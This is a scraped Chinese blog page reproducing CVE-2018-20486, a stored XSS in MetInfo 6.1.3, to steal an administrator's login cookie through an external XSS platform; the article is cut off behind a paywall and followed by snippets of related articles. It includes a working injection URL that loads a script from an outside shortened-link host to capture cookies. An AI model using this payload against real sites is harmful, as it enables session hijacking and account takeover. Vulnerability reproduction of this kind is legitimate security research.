XSS——利用MetInfo6.1.3存储XSS漏洞盗取管理员cookie登录

最新推荐文章于 2023-02-18 11:36:01 发布
最新推荐文章于 2023-02-18 11:36:01 发布
阅读量3.1k 收藏 2
点赞数 3
分类专栏: 漏洞攻击 XSS 文章标签: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44677409/article/details/90516549
版权

一、环境准备

1.1 环境

Web环境:wamp64
MetInfo版本:6.1.3

1.2 漏洞概述

漏洞类型:XSS漏洞
危险等级:中
CVE编号:CVE-2018-20486

1.3 xss平台

在xss平台上注册一个账号,并创建一个默认模块。
用于接收管理员cookie
在这里插入图片描述

二、漏洞复现

2.1

通过构造URL触发漏洞,并将xss平台的代码插入其中

127.0.0.1/test/admin/login/login_check.php?url_array[]=<script src=https://t.cn/E9E5224></script>&url_array[]=a

访问该链接返回如下结果表示插入成功
在这里插入图片描述

2.2

管理员登录

最低0.47元/天 解锁文章
小白白@
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-09-01 网安实验-XSS-存储XSS获取用户cookie
时光隧道
09-02 4万+
一:存储XSS 1.保存用户cookie 我们可以通过JS,构造一个请求,来请求一个我们有权限的页面,在构造请求的时候,把用户的cookie当作参数传过去,然后我们就可以在这个页面里,接收传过来的参数,然后再保存起来。所以首先需要写一个接收cookie的页面,它能够接收某个参数,然后保存起来。页面写好保存在c:\wamp\www\xss\的目录下,recv_cookies.php这个文件就是用来接收cookie并保存的,源码如下: 2.构造语句 <script>document.write(
MetInfo任意文件读取】--任意文件读取漏洞
m0_63241485的博客
08-29 3653
任意文件读取漏洞分析
XSS漏洞
最新发布
qq_52725216的博客
02-18 1522
xss攻击
风炫安全WEB安全学习第二十一节课 存储XSS讲解
风炫的博客
12-24 235
风炫安全WEB安全学习第二十一节课 存储XSS讲解 存储XSS演示 存储XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。 反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 如下面这个点击弹出自己的在该网站的cookie: 最大的区别就是xss代码是否存储
Metinfo 6.1.3 XSS漏洞分析
BerL1n
12-29 594
time: 2019-04-11 21:11 文章首发于安全客,Metinfo 6.1.3 XSS漏洞分析 前言 前段时间看到一个cms造成的xss漏洞,这里想分析下。这个漏洞metinfo6.1.3版本因参数问题造成前台和后台引起了两处xss漏洞。 这个漏洞的影响范围一直到最新版本(6.1.3),因为前段时间爆出的漏洞,所以新版本应该已修复。 cms最新6.13下载地址:https://www.mituo.cn/download/ 前台漏洞分析( CVE-2018-20486) 通过在前台插入xss..
【网络攻防】“跨站脚本攻击” 第二弹 ——存储XSS
翼安研习社的博客
02-04 1615
撰稿|谢泳 编辑|王聪丽、虞珍妮 信息收集|谢泳 目录1. 前言2. 什么是存储XSS3. 攻击原理4. 防御方式 1. 前言 上一篇介绍了跨域脚本攻击中的“反射型XSS”,列举和解释了恶意脚本注入的一些主要方式以及规避方法。事实上,除了直接注入JavaScript之外,还可以通过第三方比如flash、Java applet等进行攻击。 这些第三方工具有自己的运行环境,例如flash中使用ActionScript作为脚本,可以实现丰富灵活的功能,也为XSS提供了可乘之机,所以要避免加载用户自定义..
怎么修复网站漏洞metinfo远程SQL注入漏洞修补
网站安全专家
11-24 884
2018年11月23日SINE网站安全检测平台,检测到MetInfo最新版本爆出高危漏洞,危害性较大,影响目前MetInfo 5.3版本到最新的 MetInfo 6.1.3版本,该网站漏洞产生的主要原因是MetInfo的上传代码里的参数值没有进行安全过滤,导致上传路径这里进行伪造路径,并可以插入恶意的代码,以及特殊字符进行上传图片到MetInfo的后台。 MetInfo也叫米拓企业网站建站系...
day34 文件上传&黑白盒审计&逻辑&中间件&外部引用
wanjia01的博客
11-22 360
知识点:1、白盒审计三要素2、黑盒审计四要素3、白黑测试流程思路#详细点:1、检测层面:前端,后端等2、检测内容:文件头,完整性,二次渲染等3、检测后缀:黑名单,白名单,MIME检测等4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等#本章课程内容:1、文件上传-CTF赛题知识点2、文件上传-中间件解析&编辑器安全3、文件上传-实例CMS文件上传安全分析。
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7099
XSS利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
存储Xss成因及挖掘方法
02-21
存储Xss成因及挖掘方法
简单xss接收cookie平台的搭建以及xsscookie的一些总结
..
01-27 3943
接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码提取码:tdoj 我是将其搭在服务器上,模拟最真实的攻击环境。搭在服务器上需要几个条件,一是得有apache服务,二是得有php环境。 Linux环境搭建:CentOs + Apache + MySQL + PHP - 云+社区 - 腾讯云 下面说一下在搭建过程中踩的坑。 一、在上传的时候直接上传解压好的_Blue...
第五章 城会玩?抱歉我是一名程序员 存储xss偷取更高权限的管理员登陆cookie
Q893448322的博客
12-27 483
** 目录 第一章 黑客学习路线梳理 第二章 让你的kali变得更好用 第三章 别惹程序员0.0~简单的web渗透拿到用户名密码 第四章 抛弃我,我会战斗不息~跳过防火墙,进入后台 ** 继上一篇文章(第四章 抛弃我,我会战斗不息~跳过防火墙,进入后台),我们已经进入了美人所创建的网站后台,把她网页要展示的信息好好“调整”了一下,但是还是意犹未尽,毕竟现在的小小惩罚还没有让她意识到问题的严重性嘛,所以雁过留声,想着还要在她的网站植入一个木马,借此好好调戏一番抛弃自己的美人~ 但是发现我们进一步的攻击却受到了
简单的利用XSS获取用户cookie
shy的博客
10-25 4292
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
xss盲打(通过xss盲打盗取管理员账号和密码!)
qq_43814486的博客
05-03 6604
原理: 其实和一般的xss原理是一样的,不同的地方在于xss盲打的结果你看不到,你不知道它是否存在xss漏洞,因为xss盲打的结果是显示在管理员后端的,但是这并不意味着不存在xss漏洞!只要payload被执行,就存在漏洞! 上面说了一大堆,现在来点干东西!我要通过xss盲打这种漏洞盗取他们管理员的账号和密码!!!操作如下: 1,我输入的payload: <script>documen...
xss利用之获取管理员cookie
weixin_48421613的博客
08-27 3053
xss利用之获取后台管理员cookie 首先需要声明的是,我们这次讲解的小案例是开源的一个环境,并不是盲打xss,也就是说我们是可以在自己的服务器上搭建环境而后进行一系列的测试 现我们在靶场找到存储型(持久型)xss注入,我们该如何通过xss获取超级管理员cookie从而登录后台呢? 通过测试,我们得知在留言板的title(标题 )处存在存储xss注入,通过后台访问可以执行script代码 - 我们通过观察,得知body(内容)内的script代码被过滤,但是title内的被执行了
一个危险的XSS案例——轻松拿到登录用户的cookie
dengrong8117的博客
06-06 1320
casperchen from IMWeb Team. 站酷是我很喜欢的设计类站点,上面有我大二美好的回忆,卖个广告,我的个人主页是:http://www.zcool.com.cn/u/346408 很好,其实上面不是重点。这段时间周围出现了好几单安全相关的问题,基本都是XSS漏洞导致的。于是内心一直惦记着,包括上个周末在逛站酷的时候,然后突发奇想:站酷上是否也存在XSS...
CNVD-2018-20024——MetInfo 6.1.2 SQL注入漏洞
锋刃科技的博客
11-25 1430
0x00漏洞简介 metinfo是一个cms 6.1.2版本中存在一个sql盲注漏洞 0x01漏洞细节与漏洞利用 在\app\system\message\web\message.class.php的add函数。 get_one这里有个columnid 这个地方是传入int类型的参数 没有经过单引号的包围 所以对于那些不需要使用单引号的注入语句就起不到过滤作用 比如 and 1=2。 ...
存储XSS简介
热门推荐
seek_2022的博客
05-05 1万+
文章目录一、存储XSS简介(一)存储XSS的概念(二)存储XSS攻击过程(三)打XSS的潜在风险二、XSS平台使用方法三、靶场实战 一、存储XSS简介 (一)存储XSS的概念 存储XSS又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。反射型XSS的被攻击对象一般是攻击者去寻找的,就比如说:一个攻击者想盗取A的账号,那么攻击者就可以将一个含有反射型XSS的特制URL链接发送给A,然后用花言巧语诱骗A点击链接。当A不小心点进去时,就会立即受到XSS攻击。这种
XSS漏洞利用深度解析
例如,`alert(1)`或`alert(document.cookie)`这样的简单脚本可以弹出一个对话框显示用户的cookies数据,这通常是测试XSS漏洞是否存在的基础方法。 接着,资料提到了多种利用XSS的方式,包括使用AJAX(异步...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值